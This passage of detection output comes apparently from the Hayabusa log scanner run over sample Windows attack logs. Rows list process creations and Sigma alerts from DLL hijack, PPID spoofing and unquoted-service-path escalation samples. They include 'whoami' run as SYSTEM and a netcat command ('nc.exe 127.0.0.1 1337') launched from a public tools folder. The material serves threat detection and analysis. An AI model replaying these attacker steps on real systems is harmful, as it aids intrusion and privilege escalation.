Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 
21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 
06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 
+09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k 
LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
